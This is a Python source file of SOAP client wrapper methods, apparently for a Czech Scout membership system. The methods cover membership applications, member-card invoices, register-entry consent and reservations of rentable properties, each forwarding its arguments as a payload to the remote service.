def FunctionUpdateAgreementConfirm(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
    """Confirm the consent to entry in the association register."""
    # Payload keys mirror the parameter names one-to-one.
    request = dict(locals())
    request.pop("self")
    return self._client.service.FunctionUpdateAgreementConfirm(request)
# Nahrát souhlas se zápisem do spolkového rejstříku
def FunctionUpdateAgreement(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
    """Upload the consent to entry in the association register."""
    # Payload keys mirror the parameter names one-to-one.
    request = dict(locals())
    request.pop("self")
    return self._client.service.FunctionUpdateAgreement(request)
# Načíst seznam fakturovaných časopisů
def MemberCardAllMemberCardInvoiceSummaryVat(self, ID_Login, ID_MemberCardInvoice):
    """Load the list of invoiced magazines (VAT summary of a member-card invoice)."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MemberCardAllMemberCardInvoiceSummaryVat(request)
# Načíst faktury za členské karty jednoty
def MemberCardInvoiceAllUnit(self, ID_Login, ID_Unit, ID, DateGeneratingFrom, DateGeneratingTo, DisplayName=None, ID_MemberCardInvoiceState=None):
    """Load a unit's invoices for member cards."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MemberCardInvoiceAllUnit(request)
# Načíst seznam faktur za členské karty v xml
def MemberCardInvoiceAllXml(self, ID_Login, ID_Unit, ID, ID_MemberCardInvoiceGenerate, DateGeneratingFrom, DateGeneratingTo, DisplayName=None, ID_MemberCardInvoiceState=None):
    """Load the list of member-card invoices in XML."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MemberCardInvoiceAllXml(request)
# Načíst detail faktury za členské karty
def MemberCardInvoiceDetailDownloadPdf(self, ID_Login, ID):
    """Load the detail of a member-card invoice (PDF download)."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MemberCardInvoiceDetailDownloadPdf(request)
# Upravit fakturu za členské karty
def MemberCardInvoiceUpdate(self, ID_Login, ID, ID_Unit, Sequence, Maturity, DateGenerating, TotalPrice, TotalPriceWithVat, Price, PriceBase, PriceFirst, PriceSecond, VatBase, VatFirst, VatSecond, ID_MemberCardInvoiceGenerate, ID_InvoiceGroup, DateTaxableSupply, Unit=None, RegistrationNumber=None, Street=None, City=None, Postcode=None, State=None, StateCode=None, IC=None, DIC=None, DisplayName=None, ID_MemberCardInvoiceState=None, MemberCardInvoiceState=None, InvoiceGroupContractorIC=None, InvoiceGroupContractorDIC=None, InvoiceGroupContractorPhone=None, InvoiceGroupContractorEmail=None, InvoiceGroupWeb=None, InvoiceGroupFileReference=None, InvoiceGroupBankAccount=None, InvoiceGroupBankCode=None, InvoiceGroupBank=None, PaymentType=None, QRCodeString=None, InvoiceGroupContractor=None, InvoiceGroupContractorAddress=None, InvoiceBankAccount=None):
    """Update a member-card invoice."""
    # The request payload is exactly the argument list keyed by parameter
    # name, so collect it from locals() rather than repeating ~40 entries.
    request = dict(locals())
    request.pop("self")
    return self._client.service.MemberCardInvoiceUpdate(request)
# Odeslat fakturu za členské karty
def MemberCardInvoiceUpdateSend(self, ID_Login, ID, ID_Unit, Sequence, Maturity, DateGenerating, TotalPrice, TotalPriceWithVat, Price, PriceBase, PriceFirst, PriceSecond, VatBase, VatFirst, VatSecond, ID_MemberCardInvoiceGenerate, ID_InvoiceGroup, DateTaxableSupply, Unit=None, RegistrationNumber=None, Street=None, City=None, Postcode=None, State=None, StateCode=None, IC=None, DIC=None, DisplayName=None, ID_MemberCardInvoiceState=None, MemberCardInvoiceState=None, InvoiceGroupContractorIC=None, InvoiceGroupContractorDIC=None, InvoiceGroupContractorPhone=None, InvoiceGroupContractorEmail=None, InvoiceGroupWeb=None, InvoiceGroupFileReference=None, InvoiceGroupBankAccount=None, InvoiceGroupBankCode=None, InvoiceGroupBank=None, PaymentType=None, QRCodeString=None, InvoiceGroupContractor=None, InvoiceGroupContractorAddress=None, InvoiceBankAccount=None):
    """Send a member-card invoice."""
    # The request payload is exactly the argument list keyed by parameter
    # name, so collect it from locals() rather than repeating ~40 entries.
    request = dict(locals())
    request.pop("self")
    return self._client.service.MemberCardInvoiceUpdateSend(request)
# Načíst seznam typů členské karty
def MemberCardTypeAll(self, ID_Login, ID_Person, FilterByAge, ID=None, DisplayName=None):
    """Load the list of member-card types."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MemberCardTypeAll(request)
# Načíst seznam členství osob v jednotce
def MembershipAll(self, ID_Login, ID_Unit, ID_Person, OnlyDirectMember, IsSts, ShowHistory, IsValid, ID_MembershipType=None, ID_MembershipCategory=None, LastName=None, IdentificationCode=None, ShowLowerUnits=None):
    """Load the list of persons' memberships in a unit."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipAll(request)
# Načíst seznam členství osob v jednotce
def MembershipDetailPersonData(self, ID_Login, ID_Person):
    """Load membership data of a person."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipDetailPersonData(request)
# Načíst zjednodušený seznam členství osoby
def MembershipAllPersonList(self, ID_Login, ID_Person):
    """Load a simplified list of a person's memberships."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipAllPersonList(request)
# Načíst seznam přihlášek bez souboru přihlášky
def MembershipApplicationAllEmptyEnroll(self, ID_Login):
    """Load the list of applications that have no application file."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationAllEmptyEnroll(request)
# Načíst seznam přihlášek
def MembershipApplicationAll(self, ID_Login, ID, ID_Unit, ID_Person, ID_MembershipApplicationState=None, MembershipApplicationStates=None):
    """Load the list of membership applications."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationAll(request)
# Načíst detail přihlášky pro sestavu
def MembershipApplicationDetailReport(self, ID_Login, ID):
    """Load application detail for a report."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationDetailReport(request)
# Načíst detail přihlášky
def MembershipApplicationDetailAccessKey(self, ID_Login, ID_Application, AccessKey):
    """Load application detail identified by an access key."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationDetailAccessKey(request)
# Načíst detail přihlášky
def MembershipApplicationDetail(self, ID_Login, ID):
    """Load application detail."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationDetail(request)
# Založit přihlášku
def MembershipApplicationInsert(self, ID_Login, ID, ID_Unit, ID_Person, ValidTo, AccessKey, IsValid, DateCreate, LastOpened, IsAdult, DateFilled, DateFinished, Birthday, DateState, IsForeign, ID_DistrictBirth, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, ID_Assurance, Unit=None, UnitTitle=None, LogoExtension=None, RegistrationNumber=None, ID_MembershipApplicationState=None, MembershipApplicationState=None, FirstName=None, LastName=None, FirstNameParent=None, LastNameParent=None, NoteParent=None, ParentNote=None, ParentType=None, ParentTypeCustom=None, FirstNameParent2=None, LastNameParent2=None, NoteParent2=None, Parent2Note=None, ParentType2=None, ParentTypeCustom2=None, Person=None, IdentificationCode=None, PhoneMainHelp=None, PhoneMainPlaceholder=None, EmailMainHelp=None, EmailMainPlaceholder=None, Reason=None, ID_Sex=None, Sex=None, MaidenName=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, BirthCity=None, DistrictBirth=None, Degrees=None, ID_DegreeType1=None, ID_DegreeType2=None, ID_DegreeType3=None, Street=None, City=None, PostalFirstLine=None, State=None, Postcode=None, PostalStreet=None, PostalState=None, PostalPostcode=None, PostalCity=None, PhoneParent=None, EmailParent=None, PhoneParent2=None, EmailParent2=None, Phone=None, Email=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Assurance=None):
    """Create a membership application."""
    # The request payload is exactly the argument list keyed by parameter
    # name, so collect it from locals() rather than repeating ~80 entries.
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationInsert(request)
# Načíst seznam stavů přihlášky
def MembershipApplicationStateAll(self, ID_Login, ID=None, DisplayName=None):
    """Load the list of application states."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationStateAll(request)
# Generovat PDF e-přihlášky
def MembershipApplicationOtherGenerateEnroll(self, ID_Login, ID=None):
    """Generate the PDF of an e-application."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationOtherGenerateEnroll(request)
# Upravit přihlášku
def MembershipApplicationUpdateAccessKey(self, ID_Login, ID_Application, AccessKey, OnlyValidate, Birthday, IsForeign, ID_DegreeType1, ID_DegreeType2, ID_DegreeType3, ID_DistrictBirth, ID_PersonPersonParent, ID_PersonPersonParent2, ID_Assurance, CheckInfo, CheckAllowDataStorage, CheckAllowAudiovisual, CheckAllowSocialNetwork, CheckAllowMarketing, CheckCorrect, IsPostalSame, FirstName=None, LastName=None, ID_Sex=None, IdentificationCode=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Phone=None, Email=None, Note=None, MaidenName=None, ID_Citizenship=None, CitizenshipCustom=None, BirthCity=None, ID_ParentType=None, ParentTypeCustom=None, FirstNameParent=None, LastNameParent=None, EmailParent=None, PhoneParent=None, NoteParent=None, ID_ParentType2=None, ParentTypeCustom2=None, FirstNameParent2=None, LastNameParent2=None, EmailParent2=None, PhoneParent2=None, NoteParent2=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, ParentNote=None):
    """Update a membership application identified by an access key."""
    # The request payload is exactly the argument list keyed by parameter
    # name, so collect it from locals() rather than repeating ~60 entries.
    request = dict(locals())
    request.pop("self")
    return self._client.service.MembershipApplicationUpdateAccessKey(request)
# Finish a membership application
def MembershipApplicationUpdateFinish(self, ID_Login, ID, ID_Unit, ID_Person, ValidTo, AccessKey, IsValid, DateCreate, LastOpened, IsAdult, DateFilled, DateFinished, Birthday, DateState, IsForeign, ID_DistrictBirth, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, ID_Assurance, Unit=None, UnitTitle=None, LogoExtension=None, RegistrationNumber=None, ID_MembershipApplicationState=None, MembershipApplicationState=None, FirstName=None, LastName=None, FirstNameParent=None, LastNameParent=None, NoteParent=None, ParentNote=None, ParentType=None, ParentTypeCustom=None, FirstNameParent2=None, LastNameParent2=None, NoteParent2=None, Parent2Note=None, ParentType2=None, ParentTypeCustom2=None, Person=None, IdentificationCode=None, PhoneMainHelp=None, PhoneMainPlaceholder=None, EmailMainHelp=None, EmailMainPlaceholder=None, Reason=None, ID_Sex=None, Sex=None, MaidenName=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, BirthCity=None, DistrictBirth=None, Degrees=None, ID_DegreeType1=None, ID_DegreeType2=None, ID_DegreeType3=None, Street=None, City=None, PostalFirstLine=None, State=None, Postcode=None, PostalStreet=None, PostalState=None, PostalPostcode=None, PostalCity=None, PhoneParent=None, EmailParent=None, PhoneParent2=None, EmailParent2=None, Phone=None, Email=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Assurance=None):
    """Finish (submit) a membership application.

    Pure pass-through wrapper: all arguments are forwarded unchanged as one
    payload dict to the remote SOAP operation of the same name; returns the
    raw service response.
    """
    return self._client.service.MembershipApplicationUpdateFinish({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ValidTo": ValidTo, "AccessKey": AccessKey, "IsValid": IsValid, "DateCreate": DateCreate, "LastOpened": LastOpened, "IsAdult": IsAdult, "DateFilled": DateFilled, "DateFinished": DateFinished, "Birthday": Birthday, "DateState": DateState, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "ID_Assurance": ID_Assurance, "Unit": Unit, "UnitTitle": UnitTitle, "LogoExtension": LogoExtension, "RegistrationNumber": RegistrationNumber, "ID_MembershipApplicationState": ID_MembershipApplicationState, "MembershipApplicationState": MembershipApplicationState, "FirstName": FirstName, "LastName": LastName, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ParentType": ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "ParentType2": ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "Person": Person, "IdentificationCode": IdentificationCode, "PhoneMainHelp": PhoneMainHelp, "PhoneMainPlaceholder": PhoneMainPlaceholder, "EmailMainHelp": EmailMainHelp, "EmailMainPlaceholder": EmailMainPlaceholder, "Reason": Reason, "ID_Sex": ID_Sex, "Sex": Sex, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "DistrictBirth": DistrictBirth, "Degrees": Degrees, "ID_DegreeType1": ID_DegreeType1, "ID_DegreeType2": ID_DegreeType2, "ID_DegreeType3": ID_DegreeType3, "Street": Street, "City": City, "PostalFirstLine": PostalFirstLine, "State": State, "Postcode": Postcode, "PostalStreet": PostalStreet, "PostalState": PostalState, "PostalPostcode": PostalPostcode, "PostalCity": PostalCity, "PhoneParent": PhoneParent, "EmailParent": EmailParent, "PhoneParent2": PhoneParent2, "EmailParent2": EmailParent2, "Phone": Phone, "Email": Email, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Assurance": Assurance})
# Reject a membership application
def MembershipApplicationUpdateDeny(self, ID_Login, ID, ID_Unit, ID_Person, ValidTo, AccessKey, IsValid, DateCreate, LastOpened, IsAdult, DateFilled, DateFinished, Birthday, DateState, IsForeign, ID_DistrictBirth, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, ID_Assurance, Unit=None, UnitTitle=None, LogoExtension=None, RegistrationNumber=None, ID_MembershipApplicationState=None, MembershipApplicationState=None, FirstName=None, LastName=None, FirstNameParent=None, LastNameParent=None, NoteParent=None, ParentNote=None, ParentType=None, ParentTypeCustom=None, FirstNameParent2=None, LastNameParent2=None, NoteParent2=None, Parent2Note=None, ParentType2=None, ParentTypeCustom2=None, Person=None, IdentificationCode=None, PhoneMainHelp=None, PhoneMainPlaceholder=None, EmailMainHelp=None, EmailMainPlaceholder=None, Reason=None, ID_Sex=None, Sex=None, MaidenName=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, BirthCity=None, DistrictBirth=None, Degrees=None, ID_DegreeType1=None, ID_DegreeType2=None, ID_DegreeType3=None, Street=None, City=None, PostalFirstLine=None, State=None, Postcode=None, PostalStreet=None, PostalState=None, PostalPostcode=None, PostalCity=None, PhoneParent=None, EmailParent=None, PhoneParent2=None, EmailParent2=None, Phone=None, Email=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Assurance=None):
    """Reject (deny) a membership application.

    Pure pass-through wrapper: all arguments are forwarded unchanged as one
    payload dict to the remote SOAP operation of the same name; returns the
    raw service response.
    """
    return self._client.service.MembershipApplicationUpdateDeny({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ValidTo": ValidTo, "AccessKey": AccessKey, "IsValid": IsValid, "DateCreate": DateCreate, "LastOpened": LastOpened, "IsAdult": IsAdult, "DateFilled": DateFilled, "DateFinished": DateFinished, "Birthday": Birthday, "DateState": DateState, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "ID_Assurance": ID_Assurance, "Unit": Unit, "UnitTitle": UnitTitle, "LogoExtension": LogoExtension, "RegistrationNumber": RegistrationNumber, "ID_MembershipApplicationState": ID_MembershipApplicationState, "MembershipApplicationState": MembershipApplicationState, "FirstName": FirstName, "LastName": LastName, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ParentType": ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "ParentType2": ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "Person": Person, "IdentificationCode": IdentificationCode, "PhoneMainHelp": PhoneMainHelp, "PhoneMainPlaceholder": PhoneMainPlaceholder, "EmailMainHelp": EmailMainHelp, "EmailMainPlaceholder": EmailMainPlaceholder, "Reason": Reason, "ID_Sex": ID_Sex, "Sex": Sex, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "DistrictBirth": DistrictBirth, "Degrees": Degrees, "ID_DegreeType1": ID_DegreeType1, "ID_DegreeType2": ID_DegreeType2, "ID_DegreeType3": ID_DegreeType3, "Street": Street, "City": City, "PostalFirstLine": PostalFirstLine, "State": State, "Postcode": Postcode, "PostalStreet": PostalStreet, "PostalState": PostalState, "PostalPostcode": PostalPostcode, "PostalCity": PostalCity, "PhoneParent": PhoneParent, "EmailParent": EmailParent, "PhoneParent2": PhoneParent2, "EmailParent2": EmailParent2, "Phone": Phone, "Email": Email, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Assurance": Assurance})
# Update a membership application
def MembershipApplicationUpdate(self, ID_Login, ID, ID_Unit, ID_Person, ValidTo, AccessKey, IsValid, DateCreate, LastOpened, IsAdult, DateFilled, DateFinished, Birthday, DateState, IsForeign, ID_DistrictBirth, AllowDataStorage, AllowAudiovisual, AllowSocialNetwork, AllowMarketing, ID_Assurance, Unit=None, UnitTitle=None, LogoExtension=None, RegistrationNumber=None, ID_MembershipApplicationState=None, MembershipApplicationState=None, FirstName=None, LastName=None, FirstNameParent=None, LastNameParent=None, NoteParent=None, ParentNote=None, ParentType=None, ParentTypeCustom=None, FirstNameParent2=None, LastNameParent2=None, NoteParent2=None, Parent2Note=None, ParentType2=None, ParentTypeCustom2=None, Person=None, IdentificationCode=None, PhoneMainHelp=None, PhoneMainPlaceholder=None, EmailMainHelp=None, EmailMainPlaceholder=None, Reason=None, ID_Sex=None, Sex=None, MaidenName=None, ID_Citizenship=None, Citizenship=None, CitizenshipCustom=None, BirthCity=None, DistrictBirth=None, Degrees=None, ID_DegreeType1=None, ID_DegreeType2=None, ID_DegreeType3=None, Street=None, City=None, PostalFirstLine=None, State=None, Postcode=None, PostalStreet=None, PostalState=None, PostalPostcode=None, PostalCity=None, PhoneParent=None, EmailParent=None, PhoneParent2=None, EmailParent2=None, Phone=None, Email=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None, Assurance=None):
    """Update a membership application.

    Pure pass-through wrapper: all arguments are forwarded unchanged as one
    payload dict to the remote SOAP operation of the same name; returns the
    raw service response.
    """
    return self._client.service.MembershipApplicationUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Person": ID_Person, "ValidTo": ValidTo, "AccessKey": AccessKey, "IsValid": IsValid, "DateCreate": DateCreate, "LastOpened": LastOpened, "IsAdult": IsAdult, "DateFilled": DateFilled, "DateFinished": DateFinished, "Birthday": Birthday, "DateState": DateState, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "AllowDataStorage": AllowDataStorage, "AllowAudiovisual": AllowAudiovisual, "AllowSocialNetwork": AllowSocialNetwork, "AllowMarketing": AllowMarketing, "ID_Assurance": ID_Assurance, "Unit": Unit, "UnitTitle": UnitTitle, "LogoExtension": LogoExtension, "RegistrationNumber": RegistrationNumber, "ID_MembershipApplicationState": ID_MembershipApplicationState, "MembershipApplicationState": MembershipApplicationState, "FirstName": FirstName, "LastName": LastName, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ParentType": ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "ParentType2": ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "Person": Person, "IdentificationCode": IdentificationCode, "PhoneMainHelp": PhoneMainHelp, "PhoneMainPlaceholder": PhoneMainPlaceholder, "EmailMainHelp": EmailMainHelp, "EmailMainPlaceholder": EmailMainPlaceholder, "Reason": Reason, "ID_Sex": ID_Sex, "Sex": Sex, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "Citizenship": Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "DistrictBirth": DistrictBirth, "Degrees": Degrees, "ID_DegreeType1": ID_DegreeType1, "ID_DegreeType2": ID_DegreeType2, "ID_DegreeType3": ID_DegreeType3, "Street": Street, "City": City, "PostalFirstLine": PostalFirstLine, "State": State, "Postcode": Postcode, "PostalStreet": PostalStreet, "PostalState": PostalState, "PostalPostcode": PostalPostcode, "PostalCity": PostalCity, "PhoneParent": PhoneParent, "EmailParent": EmailParent, "PhoneParent2": PhoneParent2, "EmailParent2": EmailParent2, "Phone": Phone, "Email": Email, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School, "Assurance": Assurance})
# Load realty-occupation positions in a given area
def OccupationAllPositions(self, ID_Login, ID_Application, GpsLatitudeStart, GpsLongitudeStart, GpsLatitudeEnd, GpsLongitudeEnd, ID_Unit, IncludeChildUnits, Publish, ID_RealtyType, GpsLatitude, GpsLongitude, Distance, AdvertisingCategories=None):
    """Load realty-occupation positions inside the given GPS box/radius; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "GpsLatitudeStart": GpsLatitudeStart, "GpsLongitudeStart": GpsLongitudeStart,
        "GpsLatitudeEnd": GpsLatitudeEnd, "GpsLongitudeEnd": GpsLongitudeEnd,
        "ID_Unit": ID_Unit, "IncludeChildUnits": IncludeChildUnits,
        "Publish": Publish, "ID_RealtyType": ID_RealtyType,
        "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude,
        "Distance": Distance, "AdvertisingCategories": AdvertisingCategories,
    }
    return self._client.service.OccupationAllPositions(payload)
# Load the list of realty occupations of a unit
def OccupationAllUnit(self, ID_Login, ID_Unit, IsActive):
    """Load the realty occupations of unit ``ID_Unit``, filtered by ``IsActive``."""
    payload = {"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsActive": IsActive}
    return self._client.service.OccupationAllUnit(payload)
# Delete a realty occupation
def OccupationDeleteRealty(self, ID_Login, ID):
    """Delete the realty occupation ``ID`` on behalf of login ``ID_Login``."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationDeleteRealty(payload)
# Load realty occupations from a merged (grouped) area
def OccupationAllGrouped(self, ID, ID_Unit, IncludeChildUnits, Publish, ID_RealtyType, GpsLatitude, GpsLongitude, Distance, ID_Login, ID_Application, AdvertisingCategories=None):
    """Load realty occupations from a grouped area; forwards all arguments unchanged."""
    payload = {
        "ID": ID, "ID_Unit": ID_Unit, "IncludeChildUnits": IncludeChildUnits,
        "Publish": Publish, "ID_RealtyType": ID_RealtyType,
        "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude,
        "Distance": Distance, "ID_Login": ID_Login,
        "ID_Application": ID_Application, "AdvertisingCategories": AdvertisingCategories,
    }
    return self._client.service.OccupationAllGrouped(payload)
# Load realty-occupation detail (download variant)
def OccupationDetailRealtyDownload(self, ID_Login, ID, ID_Unit, ID_Realty, Publish, ID_RealtyType, Note=None, RealtyType=None):
    """Load the detail of a realty occupation; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit,
        "ID_Realty": ID_Realty, "Publish": Publish,
        "ID_RealtyType": ID_RealtyType, "Note": Note, "RealtyType": RealtyType,
    }
    return self._client.service.OccupationDetailRealtyDownload(payload)
# Load realty-occupation detail
def OccupationDetailRealty(self, ID_Login, ID, ID_Application):
    """Load the detail of realty occupation ``ID``."""
    payload = {"ID_Login": ID_Login, "ID": ID, "ID_Application": ID_Application}
    return self._client.service.OccupationDetailRealty(payload)
# Load the equipment list
def OccupationEquipmentAll(self, ID_Login, ID_Application, ID, ID_RealtyType, DisplayName=None):
    """Load the equipment list for an occupation / realty type."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID": ID, "ID_RealtyType": ID_RealtyType, "DisplayName": DisplayName,
    }
    return self._client.service.OccupationEquipmentAll(payload)
# Load the borrowable units administered by the current user
def OccupationRentAllBorrowable(self, ID_Login):
    """Load the borrowable units managed by the logged-in user."""
    return self._client.service.OccupationRentAllBorrowable(
        {"ID_Login": ID_Login}
    )
# Load the public list of borrowable units
def OccupationRentAllPublic(self, ID_Application, ID_Login, BasePrice, ScoutPrice, ChildPrice, ID_Occupation, OccupationLanguageList=None, PriceTypeList=None):
    """Load the public list of borrowable units; forwards all arguments unchanged."""
    payload = {
        "ID_Application": ID_Application, "ID_Login": ID_Login,
        "BasePrice": BasePrice, "ScoutPrice": ScoutPrice,
        "ChildPrice": ChildPrice, "ID_Occupation": ID_Occupation,
        "OccupationLanguageList": OccupationLanguageList, "PriceTypeList": PriceTypeList,
    }
    return self._client.service.OccupationRentAllPublic(payload)
# Load the public detail of a borrowable unit
def OccupationRentDetailPublic(self, ID_Application, ID, ID_Login):
    """Load the public detail of borrowable unit ``ID``."""
    payload = {"ID_Application": ID_Application, "ID": ID, "ID_Login": ID_Login}
    return self._client.service.OccupationRentDetailPublic(payload)
# Load the reservations of a borrowable unit for the calendar view
def OccupationRentReservationAllCalendar(self, ID_Login, ID_Application, ID, ShowAdminView, CalendarName=None, CalendarDescription=None):
    """Load reservations of borrowable unit ``ID`` for a calendar display."""
    payload = {
        "ID_Login": ID_Login, "ID_Application": ID_Application,
        "ID": ID, "ShowAdminView": ShowAdminView,
        "CalendarName": CalendarName, "CalendarDescription": CalendarDescription,
    }
    return self._client.service.OccupationRentReservationAllCalendar(payload)
# Load the reservation overview list
def OccupationRentReservationAllOverview(self, ID_Login, ID_OccupationRent, ID, ID_User, ID_OccupationRentReservationState=None):
    """Load the reservation overview; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID_OccupationRent": ID_OccupationRent,
        "ID": ID, "ID_User": ID_User,
        "ID_OccupationRentReservationState": ID_OccupationRentReservationState,
    }
    return self._client.service.OccupationRentReservationAllOverview(payload)
# Load the reservations of a borrowable unit
def OccupationRentReservationAll(self, ID_Login, ID_OccupationRent, ID, ID_User, ID_OccupationRentReservationState=None):
    """Load reservations of a borrowable unit; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID_OccupationRent": ID_OccupationRent,
        "ID": ID, "ID_User": ID_User,
        "ID_OccupationRentReservationState": ID_OccupationRentReservationState,
    }
    return self._client.service.OccupationRentReservationAll(payload)
# Delete a borrowable-unit reservation
def OccupationRentReservationDelete(self, ID_Login, ID):
    """Delete reservation ``ID`` of a borrowable unit."""
    payload = {"ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationRentReservationDelete(payload)
# Load the detail of a borrowable-unit reservation
def OccupationRentReservationDetail(self, ID_Application, ID_Login, ID):
    """Load the detail of reservation ``ID``."""
    payload = {"ID_Application": ID_Application, "ID_Login": ID_Login, "ID": ID}
    return self._client.service.OccupationRentReservationDetail(payload)
# Create a borrowable-unit reservation
def OccupationRentReservationInsert(self, ID_Login, ID, ID_User, ID_Occupation, ID_OccupationRent, ID_Unit, EstimatedStart, EstimatedEnd, RealStart, RealEnd, EstimatedPersonCount, LastUpdate, Created, ID_OccupationRentReservationState=None, OccupationRentReservationState=None, OccupationRent=None, Unit=None, RegistrationNumber=None, ContactPerson=None, ContactPhone=None, ContactMail=None, RejectionReason=None, Note=None):
    """Create a reservation of a borrowable unit; forwards all arguments unchanged."""
    payload = {
        "ID_Login": ID_Login, "ID": ID, "ID_User": ID_User,
        "ID_Occupation": ID_Occupation, "ID_OccupationRent": ID_OccupationRent,
        "ID_Unit": ID_Unit, "EstimatedStart": EstimatedStart,
        "EstimatedEnd": EstimatedEnd, "RealStart": RealStart, "RealEnd": RealEnd,
        "EstimatedPersonCount": EstimatedPersonCount, "LastUpdate": LastUpdate,
        "Created": Created,
        "ID_OccupationRentReservationState": ID_OccupationRentReservationState,
        "OccupationRentReservationState": OccupationRentReservationState,
        "OccupationRent": OccupationRent, "Unit": Unit,
        "RegistrationNumber": RegistrationNumber, "ContactPerson": ContactPerson,
        "ContactPhone": ContactPhone, "ContactMail": ContactMail,
        "RejectionReason": RejectionReason, "Note": Note,
    }
    return self._client.service.OccupationRentReservationInsert(payload)
# Update a borrowable-unit reservation
